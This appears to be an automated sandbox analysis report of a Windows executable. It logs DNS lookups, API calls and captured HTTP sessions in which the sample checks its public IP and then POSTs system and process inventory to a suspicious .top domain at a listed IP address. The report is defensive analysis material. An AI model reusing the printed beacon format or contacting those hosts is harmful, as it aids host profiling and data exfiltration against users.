                                                            Dec 20, 2024 16:19:56.793803930 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793812990 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793823004 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793881893 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793900967 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793910980 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.793919086 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.794044971 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.794054985 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.794064045 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.794071913 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.794080973 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.794531107 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.794540882 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.794553041 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.794564009 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.794573069 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.794583082 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.794590950 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.794600964 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.794622898 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.794646025 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.794656038 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.796314955 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.796390057 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.796400070 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.796410084 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.796531916 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.796540976 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.796577930 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.796587944 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.796741009 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.796756983 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.796827078 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.796837091 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.796902895 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.796914101 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.797018051 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.797029018 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.797066927 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.797142029 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.797153950 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.797261953 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.797277927 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.797296047 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.797306061 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.797313929 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.797378063 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.797395945 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.797497988 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.797508001 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.798319101 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.798330069 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.798341990 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.798352003 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.798360109 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.798371077 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.798381090 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.798388958 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.798398972 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.798408031 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.798420906 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.798432112 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.798440933 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.798453093 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.798465967 CET8049702185.121.15.192192.168.2.10
Timestamp                           | Source Port | Dest Port | Source IP      | Dest IP
Dec 20, 2024 16:19:56.798474073 CET | 80          | 49702     | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:19:56.798490047 CET | 80          | 49702     | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:19:56.798499107 CET | 80          | 49702     | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:19:56.798508883 CET | 80          | 49702     | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:19:56.798517942 CET | 80          | 49702     | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:19:56.798528910 CET | 80          | 49702     | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:19:56.798537970 CET | 80          | 49702     | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:19:56.798547029 CET | 80          | 49702     | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:19:56.798557043 CET | 80          | 49702     | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:19:56.798567057 CET | 80          | 49702     | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:19:56.798583031 CET | 80          | 49702     | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:19:56.840270042 CET | 80          | 49702     | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:19:56.841492891 CET | 80          | 49702     | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:19:58.055304050 CET | 49703       | 80        | 192.168.2.10   | 185.121.15.192
Dec 20, 2024 16:19:58.179075003 CET | 80          | 49703     | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:19:58.179181099 CET | 49703       | 80        | 192.168.2.10   | 185.121.15.192
Dec 20, 2024 16:19:58.179685116 CET | 49703       | 80        | 192.168.2.10   | 185.121.15.192
Dec 20, 2024 16:19:58.299308062 CET | 80          | 49703     | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:19:59.464418888 CET | 80          | 49703     | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:19:59.464839935 CET | 80          | 49703     | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:19:59.464900017 CET | 49703       | 80        | 192.168.2.10   | 185.121.15.192
Dec 20, 2024 16:19:59.465178967 CET | 49703       | 80        | 192.168.2.10   | 185.121.15.192
Dec 20, 2024 16:19:59.584779978 CET | 80          | 49703     | 185.121.15.192 | 192.168.2.10
Timestamp                           | Source Port | Dest Port | Source IP    | Dest IP
Dec 20, 2024 16:19:51.688673019 CET | 63671       | 53        | 192.168.2.10 | 1.1.1.1
Dec 20, 2024 16:19:51.688751936 CET | 63671       | 53        | 192.168.2.10 | 1.1.1.1
Dec 20, 2024 16:19:51.826662064 CET | 53          | 63671     | 1.1.1.1      | 192.168.2.10
Dec 20, 2024 16:19:51.993133068 CET | 53          | 63671     | 1.1.1.1      | 192.168.2.10
Dec 20, 2024 16:19:55.185672998 CET | 63674       | 53        | 192.168.2.10 | 1.1.1.1
Dec 20, 2024 16:19:55.185746908 CET | 63674       | 53        | 192.168.2.10 | 1.1.1.1
Dec 20, 2024 16:19:55.324074030 CET | 53          | 63674     | 1.1.1.1      | 192.168.2.10
Dec 20, 2024 16:19:55.324095964 CET | 53          | 63674     | 1.1.1.1      | 192.168.2.10
Dec 20, 2024 16:19:57.915903091 CET | 63676       | 53        | 192.168.2.10 | 1.1.1.1
Dec 20, 2024 16:19:57.916066885 CET | 63676       | 53        | 192.168.2.10 | 1.1.1.1
Dec 20, 2024 16:19:58.053770065 CET | 53          | 63676     | 1.1.1.1      | 192.168.2.10
Dec 20, 2024 16:19:58.054269075 CET | 53          | 63676     | 1.1.1.1      | 192.168.2.10
Timestamp                           | Source IP    | Dest IP | Trans ID | OP Code            | Name                  | Type           | Class       | DNS over HTTPS
Dec 20, 2024 16:19:51.688673019 CET | 192.168.2.10 | 1.1.1.1 | 0x2fae   | Standard query (0) | httpbin.org           | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:19:51.688751936 CET | 192.168.2.10 | 1.1.1.1 | 0xc382   | Standard query (0) | httpbin.org           | 28             | IN (0x0001) | false
Dec 20, 2024 16:19:55.185672998 CET | 192.168.2.10 | 1.1.1.1 | 0xa7a3   | Standard query (0) | home.twentytk20ht.top | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:19:55.185746908 CET | 192.168.2.10 | 1.1.1.1 | 0xcc62   | Standard query (0) | home.twentytk20ht.top | 28             | IN (0x0001) | false
Dec 20, 2024 16:19:57.915903091 CET | 192.168.2.10 | 1.1.1.1 | 0xe515   | Standard query (0) | home.twentytk20ht.top | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:19:57.916066885 CET | 192.168.2.10 | 1.1.1.1 | 0x7c5c   | Standard query (0) | home.twentytk20ht.top | 28             | IN (0x0001) | false
Timestamp                           | Source IP | Dest IP      | Trans ID | Reply Code   | Name                  | CName | Address        | Type           | Class       | DNS over HTTPS
Dec 20, 2024 16:19:51.993133068 CET | 1.1.1.1   | 192.168.2.10 | 0x2fae   | No error (0) | httpbin.org           |       | 34.226.108.155 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:19:51.993133068 CET | 1.1.1.1   | 192.168.2.10 | 0x2fae   | No error (0) | httpbin.org           |       | 98.85.100.80   | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:19:55.324095964 CET | 1.1.1.1   | 192.168.2.10 | 0xa7a3   | No error (0) | home.twentytk20ht.top |       | 185.121.15.192 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:19:58.053770065 CET | 1.1.1.1   | 192.168.2.10 | 0xe515   | No error (0) | home.twentytk20ht.top |       | 185.121.15.192 | A (IP address) | IN (0x0001) | false
                                                            • httpbin.org
                                                            • home.twentytk20ht.top
Session ID | Source IP    | Source Port | Destination IP | Destination Port | PID  | Process
0          | 192.168.2.10 | 49702       | 185.121.15.192 | 80               | 7928 | C:\Users\user\Desktop\5Jat5RkD3a.exe

Timestamp                           | Bytes transferred | Direction | Data
Dec 20, 2024 16:19:55.446743965 CET | 12360             | OUT       | POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1
Host: home.twentytk20ht.top
Accept: */*
Content-Type: application/json
Content-Length: 504728
                                                            Data Ascii: { "ip": "8.46.123.189", "current_time": "1734707993", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 360 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe", "pid": [TRUNCATED]
Dec 20, 2024 16:19:56.719567060 CET | 212               | IN        | HTTP/1.0 503 Service Unavailable
Cache-Control: no-cache
Connection: close
Content-Type: text/html
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


Session ID | Source IP    | Source Port | Destination IP | Destination Port | PID  | Process
1          | 192.168.2.10 | 49703       | 185.121.15.192 | 80               | 7928 | C:\Users\user\Desktop\5Jat5RkD3a.exe

Timestamp                           | Bytes transferred | Direction | Data
Dec 20, 2024 16:19:58.179685116 CET | 287               | OUT       | POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1
Host: home.twentytk20ht.top
Accept: */*
Content-Type: application/json
Content-Length: 143
                                                            Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                            Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
Dec 20, 2024 16:19:59.464418888 CET | 212               | IN        | HTTP/1.0 503 Service Unavailable
Cache-Control: no-cache
Connection: close
Content-Type: text/html
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


Session ID | Source IP    | Source Port | Destination IP | Destination Port | PID  | Process
0          | 192.168.2.10 | 49701       | 34.226.108.155 | 443              | 7928 | C:\Users\user\Desktop\5Jat5RkD3a.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-20 15:19:53 UTC | 52                | OUT       | GET /ip HTTP/1.1
Host: httpbin.org
Accept: */*
2024-12-20 15:19:54 UTC | 224               | IN        | HTTP/1.1 200 OK
Date: Fri, 20 Dec 2024 15:19:53 GMT
Content-Type: application/json
Content-Length: 31
Connection: close
Server: gunicorn/19.9.0
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
2024-12-20 15:19:54 UTC | 31                | IN        | Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
Data Ascii: { "origin": "8.46.123.189"}


Target ID: 0
Start time: 10:19:47
Start date: 20/12/2024
Path: C:\Users\user\Desktop\5Jat5RkD3a.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\5Jat5RkD3a.exe"
Imagebase: 0x270000
File size: 4'449'280 bytes
MD5 hash: 8C39C06251F42E3B7EBC710FE06753AA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true


                                                              Execution Graph

                                                              Execution Coverage:3%
                                                              Dynamic/Decrypted Code Coverage:35.2%
                                                              Signature Coverage:10.8%
                                                              Total number of Nodes:463
                                                              Total number of Limit Nodes:55
88091->88092 88093 7010c0c GetLogicalDrives 88092->88093 88095 7010d92 88093->88095 88095->87919 88097 7010b84 88096->88097 88098 7010c14 GetLogicalDrives 88097->88098 88099 7010c0c GetLogicalDrives 88098->88099 88101 7010d92 88099->88101 88101->87919 88103 7010d70 GetLogicalDrives 88102->88103 88105 7010d92 88103->88105 88105->87919 88107 7010c2c GetLogicalDrives 88106->88107 88109 7010d92 88107->88109 88109->87919 88111 7010d14 88110->88111 88112 7010d33 88110->88112 88111->87919 88113 7010d77 GetLogicalDrives 88112->88113 88114 7010d92 88112->88114 88113->88114 88114->87919 88116 7010aeb 88115->88116 88117 7010c14 GetLogicalDrives 88116->88117 88118 7010c0c GetLogicalDrives 88117->88118 88120 7010d92 88118->88120 88120->87919 88122 7010d70 88121->88122 88123 7010d77 GetLogicalDrives 88122->88123 88124 7010d92 88122->88124 88123->88124 88124->87919 88126 7010bb6 88125->88126 88127 7010c14 GetLogicalDrives 88126->88127 88128 7010c0c GetLogicalDrives 88127->88128 88130 7010d92 88128->88130 88130->87919 88132 70109fb 88131->88132 88133 701098c 88131->88133 88132->88133 88136 7010a17 88132->88136 88134 70109f7 2 API calls 88133->88134 88135 70109f3 88133->88135 88134->88133 88137 7010c14 GetLogicalDrives 88136->88137 88138 7010c0c GetLogicalDrives 88137->88138 88140 7010d92 88138->88140 88140->87919 88142 7010d2f GetLogicalDrives 88141->88142 88144 7010d92 88142->88144 88144->87919 88146 7010aa8 88145->88146 88147 7010c14 GetLogicalDrives 88146->88147 88148 7010c0c GetLogicalDrives 88147->88148 88150 7010d92 88148->88150 88150->87919 88152 7010a34 88151->88152 88153 7010c14 GetLogicalDrives 88152->88153 88154 7010c0c GetLogicalDrives 88153->88154 88156 7010d92 88154->88156 88156->87919 88157 5fb160 Sleep
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                               • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                                              • API String ID: 0-1590685507
                                                              • Opcode ID: a5b46e37954d77858e66ac573b14ceab65c9fbc8328108f74dd5082f13a9234e
                                                              • Instruction ID: 43df421707a7546f59f00f933d5432ab8ba5c80c24ba1c8d0a60f2e7554c8f06
                                                              • Opcode Fuzzy Hash: a5b46e37954d77858e66ac573b14ceab65c9fbc8328108f74dd5082f13a9234e
                                                              • Instruction Fuzzy Hash: 93C2E231A143459FD724CF68C580B6AB7E1BF89314F04CA6DEC989B262DB74ED94CB81

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSystemInfo.KERNELBASE ref: 00272579
                                                              • GlobalMemoryStatusEx.KERNELBASE ref: 002725CC
                                                              • GetDriveTypeA.KERNELBASE ref: 00272647
                                                              • GetDiskFreeSpaceExA.KERNELBASE ref: 0027267E
                                                              • KiUserCallbackDispatcher.NTDLL ref: 002727E2
                                                              • SHGetKnownFolderPath.SHELL32 ref: 0027286D
                                                              • FindFirstFileW.KERNELBASE ref: 002728F8
                                                              • FindNextFileW.KERNELBASE ref: 0027291F
                                                              Strings
                                                              Similarity
                                                              • API ID: FileFind$CallbackDiskDispatcherDriveFirstFolderFreeGlobalInfoKnownMemoryNextPathSpaceStatusSystemTypeUser
                                                              • String ID: ;%'$@$`
                                                              • API String ID: 2066228396-129122021
                                                              • Opcode ID: 74e10e0620bc79420139b5587e7262d021f4132d252525afe9676ed33f92ceac
                                                              • Instruction ID: 68baac9c63f4262957e3674a284ffe2d56be353fc2a0d78e466c4eb62d2b25c4
                                                              • Opcode Fuzzy Hash: 74e10e0620bc79420139b5587e7262d021f4132d252525afe9676ed33f92ceac
                                                              • Instruction Fuzzy Hash: 3BD1C1B49157099FCB40EF68D5856AEBBF1FF88304F00886DE998D7310E7359A848F92

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                              • String ID: 0
                                                              • API String ID: 2406880114-4108050209
                                                              • Opcode ID: 10818958f99856f0956f991f10458789b741d01f55243b8776edfaa632f955c4
                                                              • Instruction ID: 2f9d076695653476cba5e6bbda8717d7a13951229c52faca1242330b28c6871c
                                                              • Opcode Fuzzy Hash: 10818958f99856f0956f991f10458789b741d01f55243b8776edfaa632f955c4
                                                              • Instruction Fuzzy Hash: 6BE1F6B0915309DFCB50EF68D9856AEBBF5FF84304F408869E998D7350E77499888F82

                                                              Control-flow Graph

                                                              APIs
                                                              • WSAEventSelect.WS2_32(?,?,?), ref: 00280711
                                                              • WSAEventSelect.WS2_32(?,?,00000000), ref: 002809DD
                                                              • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 002809FC
                                                              Strings
                                                              Similarity
                                                              • API ID: EventSelect$EnumEventsNetwork
                                                              • String ID: N='$multi.c
                                                              • API String ID: 2170980988-2025053434
                                                              • Opcode ID: 52c2919eb3e0c7b26ff653c32a5daf452d49d8748cc79ca0dc6a3dbdb16044aa
                                                              • Instruction ID: 1defcca8c0f890eef3746fd337564eb679153e6bd19ca1d3de4b606713931690
                                                              • Opcode Fuzzy Hash: 52c2919eb3e0c7b26ff653c32a5daf452d49d8748cc79ca0dc6a3dbdb16044aa
                                                              • Instruction Fuzzy Hash: D2D1F87962A3029FE750EF60C8C1B6BB7E5FF84704F04482CF98596291E774E968CB52

                                                              Control-flow Graph

                                                              APIs
                                                              • getsockname.WS2_32(-00000020,-00000020,?), ref: 0033B2B7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID: ares__sortaddrinfo.c$cur != NULL
                                                              • API String ID: 3358416759-2430778319
                                                              • Opcode ID: 9fd6f4fe3b5cb7d2e4f330617552ce04a2fad3f13c3ca59f27529915279dee25
                                                              • Instruction ID: 741c8a61e6a5a5fd33958f0b8fbf97b1d5f13c178f62cae5fb4901ac85da9523
                                                              • Opcode Fuzzy Hash: 9fd6f4fe3b5cb7d2e4f330617552ce04a2fad3f13c3ca59f27529915279dee25
                                                              • Instruction Fuzzy Hash: C5C16B316043159FD719DF24C8C1A6AB7E1EF89314F058968FA8A8B3A2DB34ED45CB81
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cfa8caae99d279f832c33e0340af897cf11721dd752202b18f978ce157f6237a
                                                              • Instruction ID: a2d6e6c75d1b557e9025c8d1c3d46454d28290c92857aec102803011409bc0d1
                                                              • Opcode Fuzzy Hash: cfa8caae99d279f832c33e0340af897cf11721dd752202b18f978ce157f6237a
                                                              • Instruction Fuzzy Hash: 3991043862E34A4BD735AE2888947BB72D5EFD4364F348B2CE8A9421D4E770DC609781
                                                              APIs
                                                              • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0032712E,?,?,?,00001001,00000000), ref: 0033A90D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: recvfrom
                                                              • String ID:
                                                              • API String ID: 846543921-0
                                                              • Opcode ID: b591f24dce9ae6822293c398bb69c874c529a65f1c2c4ab46b57f7b63571135a
                                                              • Instruction ID: b0f71d934690829610bda0cfba07870d7a830710330a4c509e20ec8a99c55c07
                                                              • Opcode Fuzzy Hash: b591f24dce9ae6822293c398bb69c874c529a65f1c2c4ab46b57f7b63571135a
                                                              • Instruction Fuzzy Hash: EDF0F975118348AFD2109B41DC88E6BBBADEBC9754F05496DF998232119371AE109AB2
                                                              APIs
                                                              • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0032A499
                                                              • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0032A4FB
                                                              • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0032A531
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0032AA19
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0032AA4C
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0032AA97
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0032AAE9
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0032AB30
                                                              • RegCloseKey.KERNELBASE(?), ref: 0032AB6A
                                                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0032AB82
                                                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0032AC46
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0032AD0A
                                                              • RegEnumKeyExA.KERNELBASE ref: 0032AD8D
                                                              • RegCloseKey.KERNELBASE(?), ref: 0032ADD9
                                                              • RegEnumKeyExA.KERNELBASE ref: 0032AE08
                                                              • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0032AE2A
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0032AE54
